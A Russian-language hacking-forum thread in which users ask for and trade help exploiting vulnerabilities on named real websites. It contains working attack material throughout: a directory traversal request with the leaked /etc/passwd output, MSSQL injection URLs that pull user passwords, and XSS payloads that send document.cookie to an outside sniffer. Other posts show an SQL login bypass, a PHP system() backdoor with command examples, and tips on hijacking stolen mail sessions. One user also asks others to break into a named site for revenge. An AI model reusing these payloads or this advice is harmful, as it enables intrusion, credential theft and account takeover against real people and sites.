выходит "Hacking attempt"
это типа фильтрация?
если да то как обойти?
Fenomen Klass
17.08.2011, 01:00
пробуй ставить " ` если не канает,то забей)) Дальше всё равно не продвинишься,если даже этого не можешь
спс, попробую, но почему же забей, все с чего то начинали...
Fenomen Klass
17.08.2011, 01:00
Цитата:
Сообщение от kokes
спс, попробую, но почему же забей, все с чего то начинали...
Для начала выучи гугл,всмысле запросы т.е inurl: intext: и тд. И научись искать,то что ты спросил уже давно разжевывали на многих форумах.
Такую фигню выводит DLE, у меня тот же вопрос, как обойти такую защиту, кто знает намекните хоть где копать?
Perl_Master
17.08.2011, 01:00
kokes, не слушай никого! Нагугли софтину Havij и пробуй ей раскрутить. Для начала пройдись сканером каким нибудь, jsky допустим.
Kasper1898
20.08.2011, 01:00
Кто подскажет как раскрутить Directory Traversal уязвимость в POST
intPartnerType=&nextPage=1&partnerID=&SID=&thisPage=../../../../../../../../../../etc/passwd%00.png
выдает
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
distcache:x:94:94istcache:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
openvpn:x:102:103:OpenVPN:/etc/openvpn:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
memcached:x:103:104:Memcached daemon:/var/run/memcached:/sbin/nologin
nagios:x:105:106::/var/spool/nagios:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
clam:x:106:108:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
Подскажите как раскручивать эту уязвимость
https://hpc.name/showthread.php?t=30214
M@ZAX@KEP
20.08.2011, 01:00
Цитата:
Кто подскажет как раскрутить Directory Traversal уязвимость в POST
Вот уж не знал что это так называется. Dinga прав, это типичный инклуд.
Kasper1898
21.08.2011, 01:00
Dinga
M@ZAX@KEP
Спасибо,буду теперь тож знать что это инклуд))
А кто поможет раскрутить,или разобраться,то я не инклудил не разу еще.
M@ZAX@KEP
21.08.2011, 01:00
А ссылку на что дали? Извини, но подробнее тебе вряд ли прямо сейчас тут распишут
JokerBaD
24.08.2011, 01:00
Добрый вечер господа!Требуется ваша помощь!Вообщем суть такова!
есть инъекция 2-й день ломаю голову ну никак не могу полность провести инъекцию я не когда этим не занимался!постараюсь полностью обьяснить свою проблему!
hxxp://хост/default.asp?idAccess=1808310+or+1=(@@version)--
получаю
система - Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
нашел название БД и 100 таблиц в этой БД
получаю максимально 4-5 полей из каждой таблицы т.к видно фильтруется запятаю(,) пробывал заменить %2С и хец и чар не помогает
пример
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id','login','name'))--
поля вытаскивал таким способом
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id')+and+column_name+not+in+('login')+and+column_ name+not+in+('name'))--
если увеличиваю кол-во полей выскакивает ошибка что типа URl слишком длнный!
...
и еще нашел в одной таблице там полей мало было нашел поле password поле login но по такому запросу
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+ca st(password+as+nvarchar)+FROM+Users+where+login='a dmin')--
ошибки не возникает запрос проходит успешно ф-я convert не работает т.к там нужно использовать запятую и exec() так же не получется использовать!
вообщем HELPME!!!
Добавлено через 20 часов 10 минут
Тут есть кто люди????
JokerBaD
05.09.2011, 01:00
Всем спасибо разобрался))))
Может кому пригодится:
использовал вывод в XML актуально только для MSSQL
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+100+ pw+FROM+Users+for+xml+auto)-- выводит 100 паролей пользователей в Xml формате очень удобно!
так если hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+pw +FROM+Users+where+login='admin'+for+xml+auto)-- выводит только админа))))
а если фильтруется запятая или пишет что URL слишком длинный при том мы пытаемся вытянуть имена полей таблиц использвал такую конструкцию запроса:
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Users'+and+column_name+not+in+(select+to p+1+column_name+from+information_schema.columns+wh ere+table_name='Users'))--
далее top+1 top+2 top+3 и так далее)))Все удачи во взломах!
PS я ломал не просто так а была необходимость)
Kasper1898
07.11.2011, 01:00
Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE (https://hpc.name/redirector.html#http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg) http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg
Цитата:
Сообщение от Kasper1898
Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE (https://hpc.name/redirector.html#http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg) http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg
не понятно что ты хочешь ,
он так не когда не будет работать,
ты не объявил путь до скрипта js в форме
примерно так надо
/js/
вставь его после
но тогда в форме убери action="/js/xss.js
пробуй
скрипт после обновления не будет работать полюбому, т.к. js-код выполняется на клиентской машине, а все действия по изменению кода страницы, которые вы делаете - вы делаете у себя. На сервере код не изменяется после редактирования кода, поэтому после обновления страницы ничего не будет.
Kasper1898, внимательно перечитай описание к уязвимости, ты неправильно понял суть эксплуатации.
MOV_EAX, тоже самое.
Код выполняться будет, в простейшем случае, когда, например, на сервере вообще в двиге отключена защита и поставлена опция вроде "интерпретировать посты как js-код", то тогда в пост на форуме можно вписать alert(), и он выполнится. Простейший пример, но неработающий в наше время. Читаем маны.
да согласен ,если он исходный html код страницы сам решил переделать у себя на рабочем столе просто так его тестил конечно нечего не выйдет я то думал он багу нашел
Проблема с кодировкой при выводе инфы при помощи скули
code:
8�|2011-09-27|��� - �� 4.10- �����. � �/�, ������. �.5-8.
Как сделать понятнее?
M@ZAX@KEP
16.11.2011, 01:00
Переключить кодировку в браузере.
Я просканировала сайт и нашла уязвимость в порте 21: логин - guest, пароль - guest.
Я зашла на сайт через FileFilla, ввела имя хоста, логин и пароль.
Там я обнаружила, что на сайт в разные его папки залиты трои Backdoor.
Что с этим можно сделать, чтобы грохнуть сайт? или изменить его.
Там такие файлы: cgi.php, in.php. shells.php. При открытии cgi.php Касперский выдаёт, что, что это Backdoor эксплойт.
M@ZAX@KEP
25.11.2011, 01:00
l575, заходить на эти бэкдоры (шеллы) из браузера (если они вообще доступны из веба) и надеяться что на них нет паролей.
Прав записи у ftp пользовеля guest наверняка ведь нет?
Прощу прощения за столь ламерскую тему, но вот на сайте нашел XSS http://2sell.com.ua/ (https://hpc.name/redirector.html#http://2sell.com.ua/) там сразу увидите 2 поля поиска, вопрос: Как узнать адресс результата поиска, т.е. я ввожу к примеру "abrakadabra" в поле, и должен перейти по ссылке что-то вроде "http://2sell.com.ua/search-1.php?search=abrakadabra" , но вместо этого в адр. строке стоит "http://2sell.com.ua/search-1.php" и как из этого сформировать ссыль на уязвимость?
Заранее благодарен!
это POST XSS, для того чтобы заюзать нужно сделать страницу с автосабмитом формы, или поискать уязвимость в гет переменных!
например здесь = http://2sell.com.ua/view.php?id=229&...76&subsubcat=0 (https://hpc.name/redirector.html#http://2sell.com.ua/view.php?id=229&page=&cat=%27%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&subcat=76&subsubcat=0)
Всем привет, вот есть активная xss: http://kib-net.ru/personal/index.php (https://hpc.name/redirector.html#http://kib-net.ru/personal/index.php)(там при регистрации в имя\фамилию вводим алерт), вопрос, как заюзать эту уязвимость, ведь там вроде никто к тебе в профиль зайти не может, как тогда?
M@ZAX@KEP
17.12.2011, 01:00
cacucko, никак не заюзаешь. Страница с xss недоступна авторизованным пользователям, следовательно сессию увести не получится.
Lonsdalesar
17.01.2012, 01:00
Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
скажите возможно ли обойти этот фильтр?
Цитата:
Сообщение от Lonsdalesar
Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
скажите возможно ли обойти этот фильтр?
Если это в адрессной строке,то это нефильтр)Это одно и тожэ что и alert('xss'), только url-code, так сказать, нечем неотличаются, нечего страшного) А если, товарищ это в самом коде...то фильтр скорей всего)
tickhack
19.01.2012, 01:00
что это http://apps.facebook.com/mobipride/ (https://hpc.name/redirector.html#http://apps.facebook.com/mobipride/) внизу страницы ?
Цитата:
Сообщение от tickhack
что это http://apps.facebook.com/mobipride/ (https://hpc.name/redirector.html#http://apps.facebook.com/mobipride/) внизу страницы ?
это просто криво настроенный конфиг...
В чем проблема нашел Активную Xss - Это не новость но дело не в этом.
Xss находиться в поле ввода - но дело в том что стоит ограничение по символам - т.е полность скрипт не удается записать.
Это была первая проблема.
Вторая Xss находится на форме тут я решил применить Xss без Xss.
Уязвимость в бб тегах а именно вСпойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
. Втавляешь все нормально - но после вставки кода -
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Наблюдаем следущию картину -
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Буду рад помощи.
Nick Hander
06.02.2012, 01:00
Тут угловые скобки заменяются html сущностями. Видать прогнали через функцию htmlspecialchars(). И тут судя по всему скрипт срабатывает по нажатию по ссылки. Нередкий тип уязвимости. Так как тэг скрипта фильтруется, то закачать сам скрипт извне не получится. Но можно попробовать динамически создать скрипт и присвоить ему урл скрипта, лежащего на нашем сервере. Что-то типа
code:
javascript:x=document.createElement('script');x=x. setAttribute('src','тут урл скрипта');document.getElementsByTagName('he ad').appendChild(x);
Таким образом мы не используя угловые скобки создаем динамический скрипт и подключаем к нему ресурс. Также, если на странице используется jQuery, можно просто поспользоваться этим, прописав
code:
javascript:jQuery.get('http://yoursite.com/sniffer.php?'+document.cookie);
или
javascript:$.get('http://yoursite.com/sniffer.php?'+document.cookie);
При клике данный метод позволяет отправлять get запросы на любой домен в сети. Недавно именно данный метод использовал в xss на одном из известных сайтов. И даже видео снимал. https://hpc.name/showthread.php?t=32341. Посмотри, там именно такого же рода уязвимость, что и у тебя.
Нашел xss в объявлениях. Когда в заголовке пишу скрипт проверки alert("xss") , сообщение видно. А вот когда пишу адрес к снифферу пишет СЛИШКОМ ДЛИННЫЙ ЗАГОЛОВОК. Можно до 25символов добавить в заголовок, что делать? Еще слышал про слепые XSS может кто-нибудь даст ссылку на статью?
jacklndn
18.02.2012, 01:00
Открываю ссылку
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
но на сниф ничего не приходит. В чем проблема?
tickhack
18.02.2012, 01:00
Цитата:
Сообщение от jacklndn
Открываю ссылку
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
но на сниф ничего не приходит. В чем проблема?
Возможно xss прикрыли
jacklndn
18.02.2012, 01:00
Цитата:
Сообщение от tickhack
Возможно xss прикрыли
Нет все работает если вместо " написать " (с пробелом перед скобкой).
кукисы пришли, но проблема в том что захожу на маил, меняю в опере Mpop (пробовал так же менять VID, mrcu, p, b, i) и доступ получить не получается все равно, mail показывает окно с авторизацией, либо пишет Ошибка 704.
Цитата:
Сообщение от tickhack
Возможно xss прикрыли
Ну ты конечно комментарий грамотный оставил, прямл хекер)))))))))))
chelyuskin
20.02.2012, 01:00
Цитата:
Сообщение от jacklndn
Нет все работает если вместо " написать " (с пробелом перед скобкой).
кукисы пришли, но проблема в том что захожу на маил, меняю в опере Mpop (пробовал так же менять VID, mrcu, p, b, i) и доступ получить не получается все равно, mail показывает окно с авторизацией, либо пишет Ошибка 704.
возможно кук здох.
но скорее всего ошибка 704, тоесть требуется дополнительная авторизация, для подтверждения сесии.
есть несколько обходов Ошибки 704. (в паблике нету, насколько я знаю)
tickhack
20.02.2012, 01:00
Цитата:
Сообщение от jacklndn
Как решить проблему с этой Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
По гугли может найдёшь в пабле если не найдёшь придётся купить!
jacklndn
20.02.2012, 01:00
Как решить проблему с этой Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
jacklndn
22.02.2012, 01:00
Цитата:
Сообщение от tickhack
По гугли может найдёшь в пабле если не найдёшь придётся купить!
Вроде сам нашел. Гемор по-прежнему, но нужную инфу вытащить можно
jacklndn
28.02.2012, 01:00
Цитата:
Сообщение от M@ZAX@KEP
jacklndn, покажите мне их =) О каких фильтрах речь?
Может не так я выражаюсь) Но смысл в том что xss работает в мозиле и опере, но не пашет в ie и хроме
jacklndn
28.02.2012, 01:00
Есть ли варианты обойти фильтры xss в ie ?
M@ZAX@KEP
28.02.2012, 01:00
jacklndn, покажите мне их =) О каких фильтрах речь?
M@ZAX@KEP
29.02.2012, 01:00
Не все xss векторы работают во всех браузерах. Здесь (https://hpc.name/redirector.html#http://html5sec.org/) есть список различных векторов с указанием совместимости. Поищи подходящий для твоего контекста xss (я не знаю в каком участке кода у тебя xss выводится).
kipishnoy
10.03.2012, 01:00
Подскажите данная уязвимость актуальна? http://xxxxx.com:80/-gel_-klatschnas...action=buy_now (https://hpc.name/redirector.html#http://xxxxx.com:80/-gel_-klatschnass-110ml.html?action=buy_now)
Сканирую через JSky.
Пробовал вставлять линк в SQLI Helper вот что он выдает Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
Check No. of Columns - finished
Что можно сделать через эту уязвимость7
M@ZAX@KEP
11.03.2012, 01:00
kipishnoy, для начала перейти по выложенной ссылке и подумать головой, а где там какая нахрен уязвимость на белой-то странице?
D@Gshram
11.03.2012, 01:00
что делать если хочу сделать xsfr атаку. то после action ничего. ну там как обычно должна быть ссылка. и еще если при xsfr атаке после valume ничего,то скрипт должен быть внутри valume или как тут> valume="">.. и что написать внутри скрипта при xsfr атаке? и как дописать ссылку после valume к скрипту?
vr-team.ru
может у кого получиться определить версию?
Цитата:
Сообщение от hugolom
vr-team.ru
может у кого получиться определить версию?
На 3.09 похож
kingbeef
03.05.2012, 01:00
Цитата:
Сообщение от hugolom
vr-team.ru
может у кого получиться определить версию?
version = 3.0.8
kreker151
15.05.2012, 01:00
в браузерной онлайн игренашел хсс уязвимость ,(под картинкой есть форма для коментария к загружаемой картинке,вот эта форма и уязвима) альтер прокатывает, так же можно вставить картинку хтмл тегами . но когда в эту хсс вставляю скрипт онлайн синфера с этого проекта то в логах мне приходит лишь : айпи,названия браузера, ось и время.. сами пе4еньки не приходят. в 4ем дело ? пробывал разли4ные браузеры.
rossamaha
16.05.2012, 01:00
Скажите пожалуйста, как можно быстро найти уязвимость на сайте? не перебирать все файлы типа: page.php?id=1 и т.д. и ставить кавычьки.
каким образом можно отсканировать сайт на наличие дырок...
M@ZAX@KEP
17.05.2012, 01:00
2 rossamaha: http://sectools.org/tag/web-scanners/ (https://hpc.name/redirector.html#http://sectools.org/tag/web-scanners/)
MashaRomanova
30.05.2012, 01:00
мой вопрос целая тема https://hpc.name/showthread.php?t=38987
Подскажите плз
является ли это уязвимостью, или просто ошибка?
source:
JSP Error
Exception:
java.sql.SQLException: ORA-
01722
: неверное число
at oracle.jdbc.dbaccess.DBError.
throwSqlException
(DBError.java:
134
)
at oracle.jdbc.ttc7.TTIoer.
processError
(TTIoer.java:
289
)
at oracle.jdbc.ttc7.Oall7.
receive
(Oall7.java:
573
)
at oracle.jdbc.ttc7.TTC7Protocol.
doOall7
(TTC7Protocol.java:
1891
)
at oracle.jdbc.ttc7.TTC7Protocol.
parseExecuteDescribe
(TTC7Protocol.java:
830
)
at oracle.jdbc.driver.OracleStatement.
doExecuteQuery
(OracleStatement.java:
2391
)
at oracle.jdbc.driver.OracleStatement.
doExecuteWithTimeout
(OracleStatement.java:
2672
)
at oracle.jdbc.driver.OraclePreparedStatement.
executeUpdate
(OraclePreparedStatement.java:
589
)
at oracle.jdbc.driver.OraclePreparedStatement.
executeQuery
(OraclePreparedStatement.java:
527
)
at _art__form.
_jspService
(_art__form.java:
880
)
at oracle.jsp.runtime.HttpJsp.
service
(HttpJsp.java)
at oracle.jsp.app.JspApplication.
dispatchRequest
(JspApplication.java)
at oracle.jsp.JspServlet.
doDispatch
(JspServlet.java)
at oracle.jsp.JspServlet.
internalService
(JspServlet.java)
at oracle.jsp.JspServlet.
service
(JspServlet.java)
at javax.servlet.http.HttpServlet.
service
(HttpServlet.java:
588
)
at org.apache.jserv.JServConnection.
processRequest
(JServConnection.java:
456
)
at org.apache.jserv.JServConnection.
run
(JServConnection.java:
294
)
at java.lang.Thread.
run
(Thread.java:
484
)
M@ZAX@KEP
10.06.2012, 01:00
Цитата:
является ли это уязвимостью
нет
Цитата:
или просто ошибка?
да
Цитата:
Сообщение от M@ZAX@KEP
нет да
Спасибо за ответ
sadsheep
18.06.2012, 01:00
В паблике есть обход фильтра xss ie 9? Сколько не искал везде лишь инфа по фильтрам серверов. Гугл таки помог с ie 8, а вот с 9 как-то не срослось.
mr.borocco
18.06.2012, 01:00
Цитата:
Сообщение от kreker151
в браузерной онлайн игренашел хсс уязвимость ,(под картинкой есть форма для коментария к загружаемой картинке,вот эта форма и уязвима) альтер прокатывает, так же можно вставить картинку хтмл тегами . но когда в эту хсс вставляю скрипт онлайн синфера с этого проекта то в логах мне приходит лишь : айпи,названия браузера, ось и время.. сами пе4еньки не приходят. в 4ем дело ? пробывал разли4ные браузеры.
Возможно там стоит антикук, я точно не помню как это называется, короче фича такая есть, по запросу alert(document.cookies) не показывает куки, хотя они есть) Как обойти хз)
mr.borocco
18.06.2012, 01:00
Цитата:
Сообщение от MashaRomanova
мой вопрос целая тема https://hpc.name/showthread.php?t=38987
Подскажите плз
Я тебе уже там ответил) прям развернуто так) даже с примером) который нашел пока отвечал)
mr.borocco
18.06.2012, 01:00
Цитата:
Сообщение от chelyuskin
возможно кук здох.
но скорее всего ошибка 704, тоесть требуется дополнительная авторизация, для подтверждения сесии.
есть несколько обходов Ошибки 704. (в паблике нету, насколько я знаю)
Я обходил эту ошибку) тем что был допуск к поиску по письмам)то есть на главной странице майла как помню, есть возможность нажать на кнопку, написать письмо, после чего тебя перекидывает в письма, оттуда) в поиск нажимаешь букву А и тебе секунд на 20 открываются все письма, а если в исходном коде убрать кое какой скрипт) который делает каждые 20 сек onload , можно смотреть на заголовки постоянно) потом открываешь в новом окне письмо ) и так же нажимаешь постоянно на esc) Геморный обход, но все же обход)
sadsheep
20.06.2012, 01:00
Цитата:
Сообщение от M@ZAX@KEP
sadsheep, попробуй такой новомодный html5 вектор =)
source:
Проблема в том, что фильтр блочит скобки (), меняя их на ## . Так же не работает и "бла javascript: бла"(получим jav#script . Не работают все типы кодировок, которые я нашёл. В данном случае на запрос /onload= получаем /#nload= . Благо хоть не подводит, однако как туда вшить желанный js не понятно. Идеи, мысли, предожения ...
M@ZAX@KEP
20.06.2012, 01:00
sadsheep, ты уверен что это делает ie?
Тут целая куча векторов, работающих в IE9: http://html5sec.org/ (https://hpc.name/redirector.html#http://html5sec.org/)
D@Gshram
20.06.2012, 01:00
хотел бы по-подробнее как использовать уязвимость Session Cookie not Flagged as HTTPOnly
M@ZAX@KEP
20.06.2012, 01:00
sadsheep, попробуй такой новомодный html5 вектор =)
source:
sadsheep
21.06.2012, 01:00
Цитата:
Сообщение от M@ZAX@KEP
sadsheep, ты уверен что это делает ie?
Тут целая куча векторов, работающих в IE9: http://html5sec.org/ (https://hpc.name/redirector.html#http://html5sec.org/)
Похоже не мы одни побывали на этом сайте . Да уверен что ie , так как он мне сообщение выводит (IE изменил страницу для предотвращения запуска скриптов между сайтами), что как бы намекает. В то время как в лисе и опере всё работает без перебоев. В общем плачу горькими слезами.
M@ZAX@KEP
22.06.2012, 01:00
Очень интересная страничка по твоей теме: http://xss.cx/examples/ie/internet-e...-mshtmldll.txt (https://hpc.name/redirector.html#http://xss.cx/examples/ie/internet-exploror-ie9-xss-filter-rules-example-regexp-mshtmldll.txt)
Даже с разбором обхода фильтра.
sadsheep
25.06.2012, 01:00
Цитата:
Сообщение от M@ZAX@KEP
Очень интересная страничка по твоей теме: http://xss.cx/examples/ie/internet-e...-mshtmldll.txt (https://hpc.name/redirector.html#http://xss.cx/examples/ie/internet-exploror-ie9-xss-filter-rules-example-regexp-mshtmldll.txt)
Даже с разбором обхода фильтра.
Очень ценю ваши старания. И вообще очень приятно, что кто-то старается решить твою проблему, а не разглагольствовать о радиусе кривизны твоих рук. Однако и тут супостаты побывали. IE всё так же радует надписями типо(v#lueOf,t#String,location#"http://xss.cx/"#) и это всё всего лишь из одного примера, что не удивительно, ведь датировка сия художеств 1.5 years ago. Впрочем ничего новее сам не нашёл sad but true.Остаётся только искать актуальные Regex'ы и выдумывать что-то самому(однако не теряю надежды, что всё таки инфа где-нибудь да завалялась) Ещё раз большое спасибо за ответы.
Возник вопрос. Я ворую куки с помощью пассивной XSS и сниффера.
Подменяю их у себя в браузере, обновляю сайт, а авторизация не происходит. В чём проблема?
Сначала пробывал подменять два параметра (auc, asc), а потом все - невыходит. Куки точно свежие..
M@ZAX@KEP
30.06.2012, 01:00
Проверь, есть ли привязка по ip.
Нету. Кто ещё может чем-то подсказать?
Вопрос теоретический. есть DDos атаки вида SYN,UDP,ICMP-флуда.. возможна ли в принципе реализация атаки типа шторама get-запросами ресурсов сервера и может ли это кроме забива канала положить машину?
M@ZAX@KEP
18.07.2012, 01:00
Korza, может. Например, если на сайте есть скрипт поиска или ещё что-то, что жрёт много ресурсов системы. Флуд запросами на ресурсоёмкий скрипт может легко подвесить БД или интерпретатор php (или что у тебя там вместо php =) ). Поэтому на многих сайтах поиск для неавторизованных пользователей доступен только через вбив капчи.
rossamaha
01.08.2012, 01:00
как шифровать или заменять символы для xss
">. <>, и т.д.
mr.borocco
01.08.2012, 01:00
Никак если фильтруются, ищи в других формах. Бесполезно искать xss на движках вроде Джумла ворд пресс
rossamaha
01.08.2012, 01:00
какие есть методы взлома форума. phpBB и т.д.?
sql injection
Xss
mr.borocco
01.08.2012, 01:00
ничего такого не найдешь. Там. надо админов ломать, ловить на их тупости.
M@ZAX@KEP
02.08.2012, 01:00
mr.borocco, почему же. Зависит от версии движка и компетентности админа в вопросах безопасности. Если админ не пропатчил старый двиг, на который в паблике есть сплойты... можно считать что уже поймал админа на тупости -)
Кто может подсказать, нашел в лакалке у себя Пасивку на сайте, раньше все cookie приходили, теперь только палавина приходит, к примеру в опере cookie хранят такую печеньку от сайта:
ncl_login:69516.202cb962ac59075b964b07152d234b70
ncl_tzoffset:14400
Ранше они даходили, теперь тока:
ncl_tzoffset:14400
С чем это может быть связано.
rossamaha
17.08.2012, 01:00
Помогите пожалуйста разобраться,
http://www.сайт.сом:80/en/passengers/station_services_and_facilities/service_stations/pridneprovskaya_railway/
вот есть xss
как дописать код, чтобы воровать кукиисы*?
Цитата:
Сообщение от rossamaha
Помогите пожалуйста разобраться,
http://www.сайт.сом:80/en/passengers/station_services_and_facilities/service_stations/pridneprovskaya_railway/
вот есть xss
как дописать код, чтобы воровать кукиисы*?
зайди в снифер и там все коды есть и что куда вставлять
Цитата:
Сообщение от P-29
Кто может подсказать, нашел в лакалке у себя Пасивку на сайте, раньше все cookie приходили, теперь только палавина приходит, к примеру в опере cookie хранят такую печеньку от сайта:
ncl_login:69516.202cb962ac59075b964b07152d234b70
ncl_tzoffset:14400
Ранше они даходили, теперь тока:
ncl_tzoffset:14400
С чем это может быть связано.
много с чем, возможно админ подредактировал и тем самым залатал баг
Syndicate
19.08.2012, 01:00
Помогите пожалуйста,поищите дыры на этом сайте: http://icq-halyava.com/ (https://hpc.name/redirector.html#http://icq-halyava.com/) сайт самописка,кто найдёт дыры или способ как можно бд слить отпишитесь в теме пожалуйста, просто админ этого сайта кинул меня на большие деньги, админа кстате зовут Юрий Корнилов так же известный под логином yirik24 вообшем кто чем может помочь по этому сайту отпишитесь
aim+faster
19.08.2012, 01:00
delete
Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE (https://hpc.name/redirector.html#http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg) http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?
drmorgan
19.08.2012, 01:00
Цитата:
Сообщение от kir2914
Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE (https://hpc.name/redirector.html#http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg) http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?
Она позволяет удаленному пользователю выполнить команды операционной системы на целевой системе. Сценарии 'add_comments.php' и 'functions.php' не проверяют данные, представленные пользователем. Удаленный пользователь может послать специально обработанные данные, чтобы создать произвольный файл с произвольным расширением и произвольным содержанием. Удаленный пользователь может эксплуатировать эту уязвимость, чтобы загрузить PHP файл и затем заставить Web сервер выполнить PHP код.
drmorgan
19.08.2012, 01:00
Цитата:
Сообщение от kir2914
Ок. Как это реализовать?
Это инъекция , посмотри на форуме тут полно статей, тут в двух словах не отпишешся надо целую статью писать.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.
Пример:
user: ' or isnull(1/0) /*
pass: whatever
Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'.
Пример:
//***********************************************
TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);
И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.
Примеры:
http://[target]/ (https://hpc.name/redirector.html#http://[target]/)[path]//templates/tpl_global.php?command=ls%20-la
http://[target]/ (https://hpc.name/redirector.html#http://[target]/)[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd
http://[target]/ (https://hpc.name/redirector.html#http://[target]/)[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php
M@ZAX@KEP
24.08.2012, 01:00
Какая нахрен SQL инъекция, ты наркоман что ли? Откуда вообще этот текст скопировал?
Там чёрным по белому написано, что на сервере возможно уязвимая версия апача. Даже ссылка на CVE соответствующий есть. Гугли сплойт.
M@ZAX@KEP
01.09.2012, 01:00
Всё так, нет тут никакой скули.
Выкладываю Sql Injection в паблик. http://kb.arena.ru/npc_desc.php?r=1+1 (https://hpc.name/redirector.html#http://kb.arena.ru/npc_desc.php?r=1+1)
Подскажите можно ли с ней что-то сделать ? Я как не пытался не выходит :(
Lucifer2966
01.09.2012, 01:00
Если я еще не выжил из ума, то это просто ругань бд на инвалидный аргумент так как нумерация начинается с 30 а ты поставил гораздо меньше...
SpAcE_MaN26
01.09.2012, 01:00
Так это же просто предупреждения php!
noizZzefan
20.10.2012, 01:00
Сначала выучи SQL.
Если неохота/ленивый юзай всякие SQLHelperы, havij
Ну почему сразу так грубо? я не ленивый и к havij отношусь плохо,лучше попытаться ручками, просто только учусь и решил задать вопрос, надеюсь все таки кто-нибудь ответит
